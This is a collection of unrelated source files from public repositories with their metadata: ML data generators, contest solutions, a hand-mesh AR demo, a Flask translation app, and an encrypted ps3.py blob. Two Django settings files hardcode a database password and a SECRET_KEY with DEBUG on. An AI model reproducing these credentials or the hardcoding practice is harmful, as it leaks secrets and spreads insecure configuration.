755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e
|
a2102ebf826a58efbc479181f1ebb5de21d1e49f
|
refs/heads/master
| 2023-07-20T17:29:42.414170
| 2023-07-18T21:12:46
| 2023-07-18T21:12:46
| 157,024,916
| 0
| 0
| null | 2023-02-16T05:20:37
| 2018-11-10T21:55:29
|
Python
|
UTF-8
|
Python
| false
| false
| 2,226
|
py
|
import os
import data_generator
from data_generator import job_runner
from data_generator.argmining.ukp import DataLoader
from data_generator.tokenizer_wo_tf import get_tokenizer
from list_lib import lmap
from tlm.data_gen.base import truncate_seq_pair
from tlm.data_gen.label_as_token_encoder import encode_label_and_token_pair
from tlm.data_gen.lm_datagen import UnmaskedPairedDataGen, SegmentInstance
class UkpTokenAsLabelGenerator(UnmaskedPairedDataGen):
def __init__(self):
super(UkpTokenAsLabelGenerator, self).__init__()
self.ratio_labeled = 0.1 # Probability of selecting labeled sentence
def create_instances(self, topic, labeled_data):
topic_tokens = self.tokenizer.tokenize(topic.replace("_", " "))
max_num_tokens = self.max_seq_length - 3 - len(topic_tokens)
target_seq_length = max_num_tokens
instances = []
for label, tokens_b in labeled_data:
tokens_a = []
truncate_seq_pair(tokens_a, tokens_b, target_seq_length, self.rng)
swap = False
tokens, segment_ids = encode_label_and_token_pair(topic_tokens, label, tokens_b, tokens_a, swap)
instance = SegmentInstance(
tokens=tokens,
segment_ids=segment_ids)
instances.append(instance)
return instances
class UkpTokenLabelPayloadWorker(job_runner.WorkerInterface):
def __init__(self, out_path, generator):
self.out_dir = out_path
self.generator = generator
def work(self, job_id):
topic = data_generator.argmining.ukp_header.all_topics[job_id]
ukp_data = self.get_ukp_dev_sents(topic)
insts = self.generator.create_instances(topic, ukp_data)
output_file = os.path.join(self.out_dir, topic.replace(" ", "_"))
self.generator.write_instances(insts, output_file)
def get_ukp_dev_sents(self, topic):
loader = DataLoader(topic)
data = loader.get_dev_data()
tokenizer = get_tokenizer()
def encode(e):
sent, label = e
tokens = tokenizer.tokenize(sent)
return label, tokens
label_sent_pairs = lmap(encode, data)
return label_sent_pairs
|
[
"lesterny@gmail.com"
] |
lesterny@gmail.com
|
88a76d162c799f38313d04a0f33fb0b576f56b9a
|
940ad5e16ede0c344066c8f41f8b9788061bb0ec
|
/ABC133/a.py
|
bebb98ff398643d8b87c968f10d7e19a35911241
|
[] |
no_license
|
niwanowa/AtCoder
|
03fe69c97d5503aabb5a3a42ee40c9824b128289
|
f4218cf7e13d026a2a439a82340e208c10f5cef5
|
refs/heads/master
| 2021-07-24T05:23:40.624506
| 2020-05-12T12:36:01
| 2020-05-12T12:36:01
| 167,095,703
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
N,A,B = map(int, input().split())
print(min(B,N*A))
|
[
"58393481+kyuto-ja@users.noreply.github.com"
] |
58393481+kyuto-ja@users.noreply.github.com
|
1897f88ad015c004be99c47772f7326fbf9769c2
|
837ab6d73fd951f47038851c8c32db5cd33ee955
|
/backend/common/command/user_point_update_command.py
|
7b04c13d82b363929e1daf97e5d1b24e2d0a26fc
|
[] |
no_license
|
swsnu/swpp2019-team16
|
6932ddc89f5513cff1dc90febb1d3f308cf991f9
|
c7c9e91be036f1c78c94d57755eb45537c2b29ad
|
refs/heads/master
| 2023-01-07T18:58:38.399582
| 2019-12-14T13:19:13
| 2019-12-14T13:19:13
| 206,933,906
| 5
| 11
| null | 2023-01-04T12:22:36
| 2019-09-07T07:43:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 507
|
py
|
from .command import Command
USER_POINT_UPDATE_COMMAND = 'command.user_point_update'
class UserPointUpdateCommand(Command):
def __init__(self, user_id, point):
super().__init__(USER_POINT_UPDATE_COMMAND)
self._user_id = user_id
self._point = point
@property
def user_id(self):
return self._user_id
@property
def point(self):
return self._point
def __str__(self):
return 'user_id={},point={}'.format(self._user_id, self._point)
|
[
"43679861+dkim94@users.noreply.github.com"
] |
43679861+dkim94@users.noreply.github.com
|
61554408c0eb98c3e6251f605e72cf95bb1bbd1c
|
6692019df03c08d57a533250500c9624b9ef42f5
|
/testedio/local.py
|
53a7878b64a85b054b9c4eee6e64c8bf5dce943f
|
[] |
no_license
|
alifanov/testedio
|
bc009d28c2b833103ebc4156f1d182034bcf60db
|
fdfbd4af98bb77fa859345368917ee2a7510f8b0
|
refs/heads/master
| 2020-06-20T01:22:30.863510
| 2016-11-27T14:44:03
| 2016-11-27T14:44:03
| 74,890,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 786
|
py
|
# -*- coding: utf-8 -*-
DEBUG = True
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'testeddb',
'USER': 'testeduser',
'PASSWORD': 'oP1eisaiael3Sohz',
'HOST': '127.0.0.1',
'CONN_MAX_AGE': 300,
}
}
|
[
"lifanov.a.v@gmail.com"
] |
lifanov.a.v@gmail.com
|
e609e60eb27278d53ee2daa281255ee2a724f9e8
|
6c2818dfe861e4091ade259ce003aba576ce1d58
|
/dj_rapidapp/settings.py
|
225fc31265df557bc63df7dc775d2c02ad33a13d
|
[
"MIT"
] |
permissive
|
urkh/dj_rapidapp
|
3a3d7a7597553183e7f1e4b779ae660365b9577a
|
baa367823b16bc4709103a898cddd281051959c2
|
refs/heads/master
| 2021-03-27T10:22:07.357525
| 2015-05-09T05:52:00
| 2015-05-09T05:52:00
| 28,834,817
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,093
|
py
|
"""
Django settings for dj_rapidapp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9&1cllglx)6gbweky)qzedhak(iyas$*=-delzj%kh8s()qq&w'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'modules.designer',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'dj_rapidapp.urls'
WSGI_APPLICATION = 'dj_rapidapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
|
[
"gust989@gmail.com"
] |
gust989@gmail.com
|
e7da783c225cf27febaea8e230005621d565444d
|
58f1cb1761d4e7114bbe0cc54195fc3bf72ccc4d
|
/python_solution/171_180/DungeonGame.py
|
01e8e864c3b0a512d4b93f35dd5c279960ff390f
|
[] |
no_license
|
CescWang1991/LeetCode-Python
|
4e2e9b1872ef92d128c681c1ed07db19938b1ef5
|
0584b86642dff667f5bf6b7acfbbce86a41a55b6
|
refs/heads/master
| 2020-03-31T02:37:12.065854
| 2019-04-24T02:33:15
| 2019-04-24T02:33:15
| 151,832,885
| 1
| 1
| null | 2019-04-15T06:34:41
| 2018-10-06T11:22:49
|
Python
|
UTF-8
|
Python
| false
| false
| 1,308
|
py
|
# 174. Dungeon Game
# Dynamic Programming:
# 从后往前遍历,从右下角出发,dp[i][j]表示到达[i,j]时的最小HP值,dp[i][j]始终大于等于1
# 如果dungeon[i][j]为负,则dp[i][j] = min(dp[i+1][j], dp[i][j+1]) - dungeon[i][j],为右边和下边hp的最小值 - dungeon[i][j]
# 如果dungeon[i][j]为正,当dp[i][j]为负时,将其设为1。
class Solution:
def calculateMinimumHP(self, dungeon):
"""
:type dungeon: List[List[int]]
:rtype: int
"""
if not dungeon or not dungeon[0]:
return 1
m = len(dungeon)
n = len(dungeon[0])
dp = [[0] * n for i in range(m)]
dp[m-1][n-1] = -dungeon[m-1][n-1]+1 if dungeon[m-1][n-1] < 0 else 1
for i in reversed(range(m - 1)):
dp[i][n-1] = dp[i+1][n-1] - dungeon[i][n-1]
dp[i][n-1] = 1 if dp[i][n-1] <= 0 else dp[i][n-1]
for j in reversed(range(n - 1)):
dp[m-1][j] = dp[m-1][j+1] - dungeon[m-1][j]
dp[m-1][j] = 1 if dp[m-1][j] <= 0 else dp[m-1][j]
for i in reversed(range(m - 1)):
for j in reversed(range(n - 1)):
dp[i][j] = min(dp[i+1][j], dp[i][j+1]) - dungeon[i][j]
dp[i][j] = 1 if dp[i][j] <= 0 else dp[i][j]
return dp[0][0]
|
[
"cescwang1991@gmail.com"
] |
cescwang1991@gmail.com
|
0eb9f2f1d94a4eb053ed1d47b6656a5e43094f17
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/Learn/PyCharm/Algorithmic Toolbox/Greedy Algorithms/Maximum Number of Prizes/maximum_number_of_prizes.py
|
7d5a1b2fea1e80689bd1231f2652fd7b5ea7c8b9
|
[
"LicenseRef-scancode-other-permissive"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:0364270870b82331956a2b84ff0aabc4b589ce630df5b152845ae2a98acf8167
size 300
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
8904156b5ce473631854fb7c9c76a996702066ad
|
f3033e5dd3033613a17c9fe9752d7f1f15bbd78a
|
/funciones/documentacion.py
|
2426b0dcb9c17260ac1079e5327f29bf984cc2ab
|
[] |
no_license
|
vidalchile/curso-profesional-de-python
|
785a19929424abe6400b32ab21be088da1e729a8
|
3db500a31bf35b3f95317ac39ab1620598917f95
|
refs/heads/master
| 2022-03-22T03:43:00.469096
| 2019-10-09T01:23:11
| 2019-10-09T01:23:11
| 183,976,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 567
|
py
|
#Sacar provecho a nuestra documentación.
"""
Almacenamos las funciones dentro de nuestro diccionario,
posteriormente iteramos los elementos del diccionario
y en cada iteración imprimimos la documentación
"""
def suma(a, b):
"""Función suma (documentación)"""
return a + b
def resta(a, b):
"""Función resta (documentación)"""
return a - b
opciones = {'a' : suma, 'b': resta}
print("Ingrese la opción deseada")
for opcion, funcion in opciones.items():
mensaje = '{}) {}'.format(opcion, funcion.__doc__)
print(mensaje)
opcion = input("Opción : ")
|
[
"cris.vidal04@gmail.com"
] |
cris.vidal04@gmail.com
|
5e442222c9d6447fd16a6d9160111d2eb813d625
|
c0fdd5675bf262f36a22c648cee4c9ec34d2f218
|
/test_video/mesh_demo.py
|
390203a23e044edeb235bc98fc3eda3b9b9d40f7
|
[] |
no_license
|
mfkiwl/handAR
|
5917c6ef69693f4d8287c57b3a6b6742c7943179
|
b04f4aee7e39ef920d5eba1873a2b172f20f7060
|
refs/heads/main
| 2023-08-11T12:16:50.744158
| 2021-10-11T16:41:33
| 2021-10-11T16:41:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,081
|
py
|
import sys
import os
import os.path as osp
import argparse
import numpy as np
import cv2
import torch
import torchvision.transforms as transforms
from torch.nn.parallel.data_parallel import DataParallel
import torch.backends.cudnn as cudnn
import PIL
from PIL import Image
sys.path.insert(0, osp.join('..', 'main'))
sys.path.insert(0, osp.join('..', 'data'))
sys.path.insert(0, osp.join('..', 'common'))
from config import cfg
from utils.preprocessing import process_bbox, generate_patch_image
from utils.transforms import pixel2cam, cam2pixel
from utils.mano import MANO
# sys.path.insert(0, cfg.smpl_path)
sys.path.insert(0, cfg.mano_path)
# from smplpytorch.pytorch.smpl_layer import SMPL_Layer
from utils.manopth.manopth.manolayer import ManoLayer
from utils.vis import vis_mesh, save_obj, vis_keypoints_with_skeleton
from canvas import Canvas
import vispy
from vispy import app, io, gloo, scene, visuals
from vispy.util.transforms import perspective, translate, rotate, ortho, scale
import matplotlib.pyplot as plt
import math
cfg.set_args('0', 'lixel')
cudnn.benchmark = True
origin = False
joint_num = 21
# MANO mesh
vertex_num = 778
mano_layer = ManoLayer(ncomps=45, mano_root=cfg.mano_path + '/mano/models')
face = mano_layer.th_faces.numpy()
joint_regressor = mano_layer.th_J_regressor.numpy()
root_joint_idx = 0
model_path = '../weights/snapshot_%d.pth.tar' % 24
assert osp.exists(model_path), 'Cannot find model at ' + model_path
print('Load checkpoint from {}'.format(model_path))
from model_no_render import get_model
model = get_model(vertex_num, joint_num, 'test')
model = DataParallel(model).cuda()
ckpt = torch.load(model_path)
model.module.pose_backbone.load_state_dict(ckpt['pose_backbone'])
model.module.pose_net.load_state_dict(ckpt['posenet'])
model.module.pose2feat.load_state_dict(ckpt['pose2feat'])
model.module.mesh_backbone.load_state_dict(ckpt['mesh_backbone'])
model.module.mesh_net.load_state_dict(ckpt['mesh_net'])
model.module.gcn.load_state_dict(ckpt['gcn'])
model.module.global_img_feat.load_state_dict(ckpt['global_img_feat'])
model.module.segmentation_net.load_state_dict(ckpt['segmentation_net'])
model.eval()
# Set the cuda device
if torch.cuda.is_available():
device = torch.device("cuda:0")
torch.cuda.set_device(device)
else:
device = torch.device("cpu")
transform = transforms.ToTensor()
def pil2opencv(img):
open_cv_image = np.array(img)
open_cv_image = open_cv_image[:, :, ::-1].copy()
return open_cv_image
def opencv2pil(img):
pil_img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
return pil_img
def depth_buffer_to_absolute_depth(depth_buffer, near=1, far=100):
depth = np.divide(depth_buffer, 255.0)
z_ndc = np.subtract(np.multiply(depth, 2), 1)
z_eye = np.divide(2 * near * far, np.subtract(near + far, np.multiply(z_ndc, far - near)))
return z_eye
brightness = contrast = 1.0
start_recording = False
video = []
mesh = []
c = Canvas(mesh_name='hand', has_texture=False)
faces = c.mesh.get_faces()
old2new_matching = np.load('matching.npy').astype(np.int)
pos_window_tvec = []
pos_window_rvec = []
def tvec_smoothing(tvec):
alpha = 0.7
if np.isnan(tvec).any():
return pos_window_tvec[-1]
if len(pos_window_tvec) < 4:
pos_window_tvec.append(np.array(tvec))
return np.array(tvec)
else:
curr_tvec = np.array([0, 0, 0])
para = 0
for i in range(0, 4):
curr_tvec = np.add(curr_tvec, np.multiply(pos_window_tvec[3 - i], math.pow((1 - alpha), i + 1)))
para += math.pow((1 - alpha), i + 1)
curr_tvec = np.add(np.multiply(tvec, alpha), np.multiply(curr_tvec, alpha))
curr_tvec /= (para * alpha + alpha)
pos_window_tvec.pop(0)
pos_window_tvec.append(curr_tvec)
return curr_tvec
def rvec_smoothing(rvec):
alpha = 0.7
if len(pos_window_rvec) != 0:
pass
if len(pos_window_rvec) < 8:
pos_window_rvec.append(np.array(rvec))
return np.array(rvec)
else:
curr_rvec = [0, 0, 0]
para = 0
for i in range(0, 8):
curr_rvec = np.add(curr_rvec, np.multiply(pos_window_rvec[7 - i], math.pow((1 - alpha), i + 1)))
para += math.pow((1 - alpha), i + 1)
curr_rvec = np.add(np.multiply(rvec, alpha), np.multiply(curr_rvec, alpha))
curr_rvec /= (para * alpha + alpha)
# curr_rvec = np.divide(curr_rvec, alpha + alpha * para)
pos_window_rvec.pop(0)
pos_window_rvec.append(curr_rvec)
return curr_rvec
front_triangle_index = 761
back_triangle_index = 755
middle_finder_major = [395, 364]
hand_layer = MANO()
links = ( (0,1), (0,5), (0,9), (0,13), (0,17), (1,2), (2,3), (3,4), (5,6), (6,7), (7,8), (9,10), (10,11), (11,12), (13,14), (14,15), (15,16), (17,18), (18,19), (19,20) )
import scipy.io as scio
import numpy as np
import cv2
V = c.mesh.V.copy()
hand_mesh = np.zeros((778, 3))
for i in range(778):
hand_mesh[i] = V[:]['a_position'][old2new_matching[i], :3]
origin_joint = np.dot(hand_layer.joint_regressor, hand_mesh)
# Palm
origin_x = V[:]['a_position'][144, :3] - V[:]['a_position'][145, :3]
origin_x = origin_x / np.linalg.norm(origin_x)
origin_y = V[:]['a_position'][144, :3] - V[:]['a_position'][146, :3]
origin_y = origin_y / np.linalg.norm(origin_y)
origin_z = np.cross(origin_x, origin_y)
origin_z = origin_z / np.linalg.norm(origin_z)
origin_y = np.cross(origin_x, origin_z)
origin_y = origin_y / np.linalg.norm(origin_y)
M_o = np.array([[origin_x[0], origin_x[1], origin_x[2]],
[origin_y[0], origin_y[1], origin_y[2]],
[origin_z[0], origin_z[1], origin_z[2]]])
for kkk in range(0, 100):
img_path = '../imgs/' + str(kkk).zfill(4) + '.png'
original_img = cv2.imread('imgs/' + img_path)
original_img = original_img[:320, :320]
original_img = cv2.resize(original_img, (320, 320))
frame = original_img
original_img_height, original_img_width = original_img.shape[:2]
h, w = frame.shape[0], frame.shape[1]
if h < w:
frame = frame[:, int((w - h) / 2):int((w + h) / 2)]
else:
frame = frame[int((h - w) / 2):int((h + w) / 2), :]
frame = cv2.resize(frame, (320, 320))
pil_hand_frame = opencv2pil(frame)
pil_hand_frame = PIL.ImageEnhance.Brightness(pil_hand_frame).enhance(brightness)
pil_hand_frame = PIL.ImageEnhance.Color(pil_hand_frame).enhance(contrast)
frame = pil2opencv(pil_hand_frame)
original_img = frame
original_img_height, original_img_width = original_img.shape[:2]
bbox = [0, 0, 320, 320] # xmin, ymin, width, height
bbox = process_bbox(bbox, original_img_width, original_img_height)
img, img2bb_trans, bb2img_trans = generate_patch_image(original_img, bbox, 1.0, 0.0, False, cfg.input_img_shape)
bbox_img = img.copy()
img = transform(img.astype(np.float32)) / 255
img = img.cuda()[None, :, :, :]
# forward
inputs = {'img': img}
targets = {}
meta_info = {'bb2img_trans': bb2img_trans}
with torch.no_grad():
out = model(inputs, targets, meta_info, 'test')
img = img[0].cpu().numpy().transpose(1, 2, 0) # cfg.input_img_shape[1], cfg.input_img_shape[0], 3
if origin:
mesh_lixel_img = out['mesh_coord_img'][0].cpu().numpy()
else:
# mesh_lixel_img = out['mesh_coord_img'][0].cpu().numpy()
mesh_lixel_img = out['gcn'][0].cpu().numpy()
test = mesh_lixel_img.copy()
#
if not origin:
joint = out['pose'][0].cpu().numpy()
else:
joint = out['joint_coord_img'][0].cpu().numpy()
pred_joint = joint.copy()
# print(joint)
# np.save(str(kkk) + '.npy', joint[:, :2])
# restore mesh_lixel_img to original image space and continuous depth space
mesh_lixel_img[:, 0] = mesh_lixel_img[:, 0] / cfg.output_hm_shape[2] * cfg.input_img_shape[1]
mesh_lixel_img[:, 1] = mesh_lixel_img[:, 1] / cfg.output_hm_shape[1] * cfg.input_img_shape[0]
mesh_lixel_img[:, :2] = np.dot(bb2img_trans,
np.concatenate((mesh_lixel_img[:, :2], np.ones_like(mesh_lixel_img[:, :1])),
1).transpose(1, 0)).transpose(1, 0)
mesh_lixel_img[:, 2] = (mesh_lixel_img[:, 2] / cfg.output_hm_shape[0] * 2. - 1) * (cfg.bbox_3d_size / 2)
joint[:, 0] = joint[:, 0] / cfg.output_hm_shape[2] * cfg.input_img_shape[1]
joint[:, 1] = joint[:, 1] / cfg.output_hm_shape[1] * cfg.input_img_shape[0]
joint[:, :2] = np.dot(bb2img_trans,
np.concatenate((joint[:, :2], np.ones_like(joint[:, :1])),
1).transpose(1, 0)).transpose(1, 0)
# visualize lixel mesh in 2D space
vis_img = original_img.copy().astype(np.uint8)
# res[np.where((res==(255, 255, 255)).all(axis=2))] = vis_img[np.where((res==(255, 255, 255)).all(axis=2))]
# vis_img = cv2.addWeighted(vis_img, 0.5, res, 0.5, 0)
vis_img = vis_mesh(vis_img, mesh_lixel_img)
joint_img = original_img.copy().astype(np.uint8)
joint_img = vis_keypoints_with_skeleton(joint_img, joint, links)
c.view = c.default_view
c.program['u_view'] = c.view
c.program['u_mat_rendering'] = 0.0
homo_coord = np.append(mesh_lixel_img, np.ones((mesh_lixel_img.shape[0], 1)), axis=1)
old2new_coord = np.zeros((778, 4))
for i in range(778):
old2new_coord[old2new_matching[i]] = homo_coord[i]
# mapped_coord = np.zeros((c.mapping.shape[0], 4))
# mapped_coord = np.zeros((958, 4))
mapped_coord = np.zeros((c.mapping.shape[0], 4))
# mapped_coord = np.zeros((778, 4))
for i in range(mapped_coord.shape[0]):
mapped_coord[i] = old2new_coord[int(c.mapping[i]) - 1]
mapped_coord[:, :2] = mapped_coord[:, :2] / 320 * 2 - 1
mapped_coord[:, 1] *= -1
# mapped_coord[:, :2] *= 1.04
mapped_coord[:, 2] *= 2.5 # Thickness Hacking
V = c.mesh.V.copy()
######################
# Old Hand Mesh
######################
scale = 0.4 # paddle
V[:]['a_position'][mapped_coord.shape[0]:, :3] -= V[:]['a_position'][145, :3]
# Scale
V[:]['a_position'][mapped_coord.shape[0]:, :3] *= scale
######################
# New Hand Mesh
######################
view_pos = np.dot(np.linalg.inv(c.projection.T), mapped_coord.T)
model_pos = np.dot(np.linalg.inv(c.view.T), view_pos)
world_pos = np.dot(np.linalg.inv(c.model.T), model_pos)
world_pos = world_pos / world_pos[3, :]
V[:]['a_position'][:mapped_coord.shape[0], :] = world_pos.transpose(1, 0)
hand_mesh = np.zeros((778, 3))
for i in range(778):
hand_mesh[i] = V[:]['a_position'][old2new_matching[i], :3]
joint = np.dot(hand_layer.joint_regressor, hand_mesh)
######################
# Object Transformation
######################
object_verts = V[:]['a_position'][mapped_coord.shape[0]:, :3]
object_center = np.average(object_verts, axis=0)
# Rotation
new_x = V[:]['a_position'][144, :3] - V[:]['a_position'][145, :3]
new_x = new_x / np.linalg.norm(new_x)
new_y = V[:]['a_position'][144, :3] - V[:]['a_position'][146, :3]
new_y = new_y / np.linalg.norm(new_y)
new_z = np.cross(new_x, new_y)
new_z = new_z / np.linalg.norm(new_z)
new_y = np.cross(new_x, new_z)
new_y = new_y / np.linalg.norm(new_y)
M_n = np.array([[new_x[0], new_x[1], new_x[2]],
[new_y[0], new_y[1], new_y[2]],
[new_z[0], new_z[1], new_z[2]]])
M_n = rvec_smoothing(M_n)
adjust = np.zeros((3, 3))
V[:]['a_position'][mapped_coord.shape[0]:, :3] = np.dot(M_n.T, np.dot(np.linalg.inv(M_o.T),
V[:]['a_position'][mapped_coord.shape[0]:,
:3].T)).T
pos = tvec_smoothing(V[:]['a_position'][145, :3])
V[:]['a_position'][mapped_coord.shape[0]:, :3] += pos
c.vertices_buff.set_data(V)
light_mat = np.zeros((4, 4)).astype(np.float)
light_mat[:3, :3] = np.dot(M_n.T, np.linalg.inv(M_o.T))
light_mat[-1, -1] = 1
c.program['u_light_mat'] = light_mat
c.update()
frame_render = c.render()
frame_render = np.array(frame_render[:, :, 0:3])
frame_render = cv2.cvtColor(frame_render, cv2.COLOR_RGB2BGR)
hsv = cv2.cvtColor(frame_render, cv2.COLOR_BGR2HSV)
hand_mask = cv2.inRange(hsv, (60, 0, 0), (80, 256, 256))
######################
# Hand Mesh
######################
result = frame.copy()
result[np.where(hand_mask == 0)] = frame_render[np.where(hand_mask == 0)]
cv2.imshow('frame', result)
key = cv2.waitKey(1)
if key == ord('q'):
break
|
[
"1155116223@link.cuhk.edu.hk"
] |
1155116223@link.cuhk.edu.hk
|
53883e8800ced687ff86dd92e63e098998975a37
|
1ee096359c79d095c2bb11b15b1bec7442b62f6c
|
/app.py
|
cb4845f2591355844287947d756c68fc9472c6c4
|
[
"MIT"
] |
permissive
|
lordserch/flask-azure-cognitive-services
|
4f3961c779c8a83c6160d6585221e834c35658ea
|
2d66718df90e8ea02f1a7c26f68af1f8a93c29a7
|
refs/heads/master
| 2020-06-16T13:01:16.987200
| 2019-07-06T21:58:42
| 2019-07-06T21:58:42
| 195,583,713
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,393
|
py
|
import translate, os, sentiment, synthesize
from flask import Flask, render_template, url_for, jsonify, request, send_from_directory
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
@app.route('/')
def index():
return render_template('index.html')
@app.route('/translate-text', methods=['POST'])
def translate_text():
data = request.get_json()
text_input = data['text']
translation_output = data['to']
response = translate.get_translation(text_input, translation_output)
return jsonify(response)
@app.route('/favicon.ico')
def favicon():
return send_from_directory(os.path.join(app.root_path, 'static'),
'favicon.ico', mimetype='image/vnd.microsoft.icon')
@app.route('/sentiment-analysis', methods=['POST'])
def sentiment_analysis():
data = request.get_json()
input_text = data['inputText']
input_lang = data['inputLanguage']
output_text = data['outputText']
output_lang = data['outputLanguage']
response = sentiment.get_sentiment(input_text, input_lang, output_text, output_lang)
return jsonify(response)
@app.route('/text-to-speech', methods=['POST'])
def text_to_speech():
data = request.get_json()
text_input = data['text']
voice_font = data['voice']
tts = synthesize.TextToSpeech(text_input, voice_font)
tts.get_token()
audio_response = tts.save_audio()
return audio_response
|
[
"sergiorol@hotmail.com"
] |
sergiorol@hotmail.com
|
e5d1f6d1168b0b81451e306681670034888c9b43
|
db24baee3c6054fe55498dd1c66e55bee54a1305
|
/allposibilityofijk.py
|
e516682b6452a0e7bf79200036365a04c3023043
|
[] |
no_license
|
aksharyash/CodeKata-GUVI
|
cb0ff6f2d4193d94dd8b0dcc31de0973eb315907
|
7d523f4530b46f0e4da375295d8de19d4faa1bf5
|
refs/heads/master
| 2020-06-21T09:40:37.731312
| 2019-08-14T07:51:27
| 2019-08-14T07:51:27
| 197,411,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
n=int(input())
inp=list(map(int,input().split()))
lst=[[inp[i],inp[j],inp[k]] for i in range(len(inp)) for j in range(len(inp)) for k in range(len(inp))if inp[i]+inp[j]==inp[k] and i<j<k]
for i in lst:
for j in i:
if j=='[' or j==']' or j==',':
pass
else:
print(j,end=' ')
print()
|
[
"noreply@github.com"
] |
aksharyash.noreply@github.com
|
09e0445c83d6ca20cec8fb1da65e4af21fabe937
|
3506a6ecd58698af0415ca7300d9f43e2f3a27c0
|
/environment_creator/main_env_creator.py
|
61d3bf1ea4bd3a3871ea53609935aed2e7cf7487
|
[] |
no_license
|
FernandoFuentesArija/marketing_de
|
1803887f8f200d8f8db478968be41b1781d5bd80
|
5c7fb11874e85ab8295158b2b71c186e39d0b065
|
refs/heads/master
| 2020-04-13T00:23:59.468129
| 2019-06-13T21:13:07
| 2019-06-13T21:13:07
| 162,844,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 360
|
py
|
from bbdd_manager.Mongo_manager import Mongo_manager
from bbdd_manager import ConfigVariablesBbdd
from environment_creator.Object_generator import Object_generator
# Creamos una conexion a la BBDD
bbdd_connec = Mongo_manager(ConfigVariablesBbdd.env_database)
# Creamos el objeto
og1 = Object_generator(bbdd_connec)
og1.create_json_with_objects("PERSON",10000)
|
[
"fernando_fuentes_arija@yahoo.es"
] |
fernando_fuentes_arija@yahoo.es
|
c4b13827dd26e6eb1f2560c0927b0bfa450019ad
|
37d36adb9284f9ff19e9cc6ec3f323ef59b2473b
|
/a3/ps3.py
|
ac9e1a3ad4ed1abfc3f065b47582fa896a785304
|
[] |
no_license
|
mfidler88/sem2-s2018
|
35c55d75020b2b5ecc5f1c8ea6459a0680a5c00c
|
9f6ba355b21011582fa82e90b504023187801add
|
refs/heads/master
| 2021-09-13T04:52:23.065894
| 2018-04-25T05:26:04
| 2018-04-25T05:26:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,340
|
py
|
U2FsdGVkX1+h1j641VJMjDoI31AVWEaUfvPJr59gaHB3lLTXXQd50YhlAEpYV6NA
kf5eJ2tjbffBxten27jFaxvx517BVP8GcrW5QrFpYWSm3t0OHjsMS55T2cJg8pLG
74tCMpXmUG97oBYnhwQnGUsONmvF8FWY2zKWwbWWa3An17u9dpyM2x2uT4zJDL5z
yQed8xpYkolYjIZ0N+vmNUAqpG6t8htqzWlQOiyqLg2fYwfzcRL9XSB/bmtcwGj/
UyuPXnQTAvjin2vlsR13+2NOauC+Obbhn39HrBn6WXbI+/DWwiVQ/5yM/iqruRrB
yDWUC8O45IyvK8jmyAPY7U/qSWOVZI5vAu5qkgTr2te6rTOTVBCGXl46AeT374T8
GaLAFYz37su+rPk2MvPUECgmNQ3KkAnBIoquzRe15LLIG1OeWuKwZZywBLfCezaP
